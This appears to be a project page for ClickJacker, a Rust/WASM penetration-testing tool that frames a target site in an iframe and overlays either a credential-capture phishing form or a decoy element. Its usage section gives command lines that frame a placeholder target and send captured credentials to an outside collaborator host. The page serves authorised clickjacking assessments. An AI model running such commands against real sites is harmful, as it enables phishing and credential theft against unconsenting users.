← projects

rust · wasm · clickjacking · red team

ClickJacker


web page to clickjack:
collaborator address:
decoy overlay:
session history

    Live demo. Framing is real (frame-src https:). Phished credentials are blocked from leaving your browser by CSP.

    What it does

    ClickJacker frames a target URL in an iframe and places an attack element over the top. Two modes are available: a phishing overlay, which drops a credential-capture form and POSTs submitted entries to a collaborator address; and a decoy overlay, which places a draggable, resizable element on top of the framed site for classic clickjacking demonstrations. The phishing approach tends to produce the stronger finding in client reports, but the decoy mode covers cases where the impact of a frameability issue needs to be shown without a credential angle.

    Whether a target is actually vulnerable still requires judgement on your part. Framebusting JavaScript and response headers can defeat framing in ways that are difficult to check automatically, so the tool puts the PoC on screen and leaves the assessment to you.

    Decoy templates

    The decoy overlay ships with four built-in templates: a fake button, a survey prompt, a security verification banner, and a flash reward. A fifth option takes arbitrary HTML, so you can tailor the element to the target without modifying the binary. All overlays are draggable and resizable from any edge or corner, with an opacity slider to adjust visibility. The chrome fades after ten seconds of inactivity and restores on interaction, which keeps the PoC screenshot clean.

    The original Go version

    The tool started as a Go project. The Go version used net/http as the server, embedded the HTML template, CSS, and fonts with //go:embed, and handled the client-side overlay logic in TypeScript compiled to a single JS bundle. The CONTAINER=TRUE environment variable suppressed the automatic browser open for Docker use. That version still lives in the go/ directory of the repository if you need to reference it.

    The Rust rewrite

    The current version replaces Go with Rust throughout. The server is Axum, and the client-side overlay logic is compiled to WASM via wasm-bindgen, replacing the TypeScript bundle. The core overlay logic lives in clickjack-core, shared between the CLI and the WASM crate. The CLI is in clickjack-cli, and clickjack-wasm exposes the DOM manipulation functions to the browser.

    A few specific changes from the Go version worth noting:

    • Two attack modes. The Go version only had the phishing form overlay. The Rust version adds the decoy overlay with templates, drag/resize, and opacity control.
    • --no-open flag. Replaces the CONTAINER=TRUE environment variable for suppressing the automatic browser open.
    • Configurable port. --port defaults to 9999 but can be overridden, which was not available in the Go version.
    • WASM instead of TypeScript. The client-side logic is compiled from the same Rust codebase as the server rather than maintained as a separate TypeScript project.

    Usage

    # frame a target and capture credentials to a collaborator address
    clickjack https://app.acme.example https://x9k2.oastify.com
    
    # custom port
    clickjack --port 8888 https://app.acme.example
    
    # optional logo in the nav bar
    clickjack --logo ./logo.svg https://app.acme.example https://x9k2.oastify.com
    
    # suppress automatic browser open (e.g. Docker, headless environments)
    clickjack --no-open https://app.acme.example

    Why it saves time on multi-application engagements

    Clickjacking is a low-complexity finding but adds up on engagements with a large number of in-scope applications. Building a framing PoC for each host by hand means writing HTML, hosting it, and taking a screenshot, repeated across every application and every authenticated route you want to evidence. ClickJacker reduces that to a single command per host. The decoy overlay and phishing form are ready immediately; swap the target argument for the next host and the next screenshot follows in seconds.

    Authorised testing only. Use against systems you have explicit permission to assess.